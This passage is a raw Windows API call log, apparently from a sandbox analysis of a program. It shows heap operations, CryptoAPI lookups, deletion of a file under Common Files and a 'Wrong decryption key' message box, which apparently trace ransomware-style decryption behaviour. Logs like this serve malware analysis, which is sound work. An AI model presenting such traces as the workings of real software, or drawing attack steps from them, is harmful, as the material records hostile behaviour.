(HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0138 [0269.299] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.299] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0138 | out: hHeap=0xb80000) returned 1 [0269.299] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b0f8 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.299] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0269.299] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc40 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb50 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0f8 | out: hHeap=0xb80000) returned 1 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0f8 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98950 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98860 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.300] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.300] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffca0 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aca8 [0269.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad68 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffb50 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0138 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffb50 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffb10 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad68 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.301] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb10 | out: hHeap=0xb80000) returned 1 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffb10 [0269.301] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad68 [0269.302] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.302] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcb0 [0269.302] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.302] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.302] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.302] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.302] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.302] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.302] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcb0 [0269.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.303] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x14) returned 0xde30f8 [0269.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0xde30f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0269.303] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.303] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdf0 [0269.303] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde30f8 | out: hHeap=0xb80000) returned 1 [0269.303] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0269.303] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfdf0 | out: hHeap=0xb80000) returned 1 [0269.303] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.303] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfdf0 [0269.303] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcb0 [0269.303] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfdf0 | out: hHeap=0xb80000) returned 1 [0269.304] CryptReleaseContext (hProv=0xbe7270, dwFlags=0x0) returned 1 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffbf0 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc7618 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ae58 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad68 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9adc8 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adc8 | out: hHeap=0xb80000) returned 1 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9adc8 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aee8 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aee8 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.304] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.304] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aee8 [0269.305] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9acc0 [0269.305] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc40 [0269.305] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9acc0 | out: hHeap=0xb80000) returned 1 [0269.305] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc40 | out: hHeap=0xb80000) returned 1 [0269.305] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aee8 | out: hHeap=0xb80000) returned 1 [0269.305] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb50 | out: hHeap=0xb80000) returned 1 [0269.305] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb10 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0138 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aca8 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad38 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aea0 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d40 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98830 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aeb8 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd988f0 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98920 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98950 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0f8 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98860 | out: hHeap=0xb80000) returned 1 [0269.307] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adc8 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0269.308] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbf0 | out: hHeap=0xb80000) returned 1 [0269.308] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 1 [0269.308] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f45c) returned 0 [0269.308] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f45c) returned 1 [0269.308] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.308] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffbf0 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffca0 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.309] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b050 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.309] PeekMessageW (in: lpMsg=0x75f02c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f02c) returned 0 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.309] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb10 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb10 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbf0 | out: hHeap=0xb80000) returned 1 [0269.309] FreeLibrary (hLibModule=0x74f20000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.309] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.309] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17ba0 | out: hHeap=0xb80000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda4158 | out: hHeap=0xb80000) returned 1 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aed0 | out: hHeap=0xb80000) returned 1 [0269.310] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffbf0 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb10 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffb10 | out: hHeap=0xb80000) returned 1 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.310] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbf0 | out: hHeap=0xb80000) returned 1 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.310] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aed0 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ae58 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b050 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9adc8 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ad68 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98860 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0138 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0f8 [0269.311] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffbf0 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbf0 | out: hHeap=0xb80000) returned 1 [0269.311] CloseHandle (hObject=0x618) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98aa0 | out: hHeap=0xb80000) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcf0 | out: hHeap=0xb80000) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe25d20 | out: hHeap=0xb80000) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17aa0 | out: hHeap=0xb80000) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae10 | out: hHeap=0xb80000) returned 1 [0269.311] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc00 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfeb8 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0f8 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0138 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aed0 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adc8 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad68 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98860 | out: hHeap=0xb80000) returned 1 [0269.312] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe18 | out: hHeap=0xb80000) returned 1 [0269.312] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0269.312] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc00 [0269.312] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcf0 [0269.312] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffbf0 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.313] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbf0 | out: hHeap=0xb80000) returned 1 [0269.313] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.313] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcf0 | out: hHeap=0xb80000) returned 1 [0269.313] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc00 | out: hHeap=0xb80000) returned 1 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe18 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98860 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ad68 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b050 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9adc8 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9ae58 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9aed0 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0138 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0f8 [0269.313] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc00 [0269.313] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc00 | out: hHeap=0xb80000) returned 1 [0269.313] CloseHandle (hObject=0x5e4) returned 1 [0269.314] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98980 | out: hHeap=0xb80000) returned 1 [0269.314] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc70 | out: hHeap=0xb80000) returned 1 [0269.314] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe35d28 | out: hHeap=0xb80000) returned 1 [0269.314] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17b60 | out: hHeap=0xb80000) returned 1 [0269.314] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adf8 | out: hHeap=0xb80000) returned 1 [0269.315] DeleteFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\2620738370" (normalized: "c:\\progra~2\\common~1\\2620738370")) returned 1 [0269.317] FindNextFileW (in: hFindFile=0xe17aa0, lpFindFileData=0x75f5b0 | out: lpFindFileData=0x75f5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36ba8410, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x41e2fde0, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x41e8ca40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x75f5e8, dwReserved1=0x759a14dd, cFileName="2620738370", cAlternateFileName="262073~2")) returned 0 [0269.317] FindClose (in: hFindFile=0xe17aa0 | out: hFindFile=0xe17aa0) returned 1 [0269.317] MessageBoxW (hWnd=0x0, lpText="Wrong decryption key", lpCaption="Error!", uType=0x10010) returned 1 [0269.388] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.388] NtdllDialogWndProc_W () returned 0x1 [0269.389] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.389] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.389] NtdllDialogWndProc_W () returned 0x0 [0269.392] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.392] GetWindowLongW (hWnd=0xa0170, nIndex=-20) returned 256 [0269.393] NtdllDialogWndProc_W () returned 0x1 [0269.393] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.393] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.393] GetClientRect (in: hWnd=0xa0170, lpRect=0x75f288 | out: lpRect=0x75f288) returned 1 [0269.393] GetCursorPos (in: lpPoint=0x75f298 | out: lpPoint=0x75f298*(x=883, y=506)) returned 1 [0269.393] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f298 | out: lpPoint=0x75f298) returned 1 [0269.393] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0269.393] SetCursor (hCursor=0x10003) returned 0x10007 [0269.393] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.393] NtdllDialogWndProc_W () returned 0x0 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] NtdllDialogWndProc_W () returned 0x1 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.394] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] NtdllDialogWndProc_W () returned 0x0 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.394] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.394] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.397] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.397] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.397] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 